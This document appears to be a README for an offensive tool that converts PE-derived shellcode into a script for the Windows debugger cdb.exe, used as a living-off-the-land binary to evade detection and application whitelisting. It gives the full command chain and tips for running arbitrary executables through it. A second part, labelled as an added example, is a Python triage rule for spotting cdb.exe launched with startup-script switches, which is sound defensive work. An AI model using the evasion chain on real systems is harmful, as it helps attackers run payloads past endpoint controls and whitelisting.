This tool converts shellcode generated with pe_to_shellcode to cdb format. cdb.exe is a LOLBIN that can help evade detection and application whitelisting. More information about it can be found in my blog post.
- pe_to_shellcode
- xxd
```
# Generates executable.shc.exe
pe2shc.exe <executable>
xxd -i executable.shc.exe > temp.out
# Generates out.wds
python cdb.py -f temp.out
cdb.exe -pd -cf out.wds -o notepad.exe
```
The test.exe binary launches calc.exe.
- I had some issues making it work on some executables. Be aware of this in case you face problems.
- Each executable will have a different number of breakpoints. Append 'g' to out.wds as many times as necessary to automatically continue when a breakpoint is hit.
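
For defenders, the `cdb.exe -pd -cf out.wds -o notepad.exe` invocation above is visible in process-creation telemetry. The following is an added example, not part of this tool: it triages Sysmon Event ID 1 style records for cdb.exe started with startup commands. The sample events, the severity labels and the Windows Kits path heuristic are assumptions made for the example.

```python
import re

# Constructed process-creation records in the style of Sysmon Event ID 1.
# Users, paths and the renamed binary are invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\Downloads\cdb.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": "cdb.exe -pd -cf out.wds -o notepad.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\dbgsvc.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": r'dbgsvc.exe -cf "C:\Users\bob\AppData\Local\Temp\a.wds" -o notepad.exe'},
    {"Image": r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe",
     "OriginalFileName": "CDB.Exe", "CommandLine": r"cdb.exe -z C:\dumps\app.dmp"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
]

STARTUP_FLAGS = {"-cf", "-c"}  # -cf <file>: script run at startup; -c "<cmd>": initial command

def image_name(event):
    return event["Image"].rsplit("\\", 1)[-1].lower()

def is_cdb(event):
    """Match the file name or the PE OriginalFileName, so a renamed copy still hits."""
    return image_name(event) == "cdb.exe" or event.get("OriginalFileName", "").lower() == "cdb.exe"

def switches(cmdline):
    """Split a command line (quoted arguments kept whole) and return its switches."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)[1:]  # drop the program name
    # Treating /x like -x is a conservative assumption made for this example.
    return {"-" + t[1:].lower() for t in tokens if t[0] in "-/" and len(t) > 1}

def triage(event):
    """Return (severity, reasons) for a cdb.exe launch, or None for other processes."""
    if not is_cdb(event):
        return None
    reasons = []
    startup = switches(event["CommandLine"]) & STARTUP_FLAGS
    if startup:
        reasons.append("startup commands via " + ",".join(sorted(startup)))
    if image_name(event) != "cdb.exe":
        reasons.append("renamed debugger binary")
    if "\\windows kits\\" not in event["Image"].lower():
        reasons.append("outside a Windows Kits install path")
    if startup:
        return ("high" if len(reasons) > 1 else "medium", reasons)
    return ("low" if reasons else "info", reasons)

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), "<-", ev["CommandLine"])
```

Matching on `OriginalFileName` as well as the image name keeps the rule effective when the debugger is copied under another name.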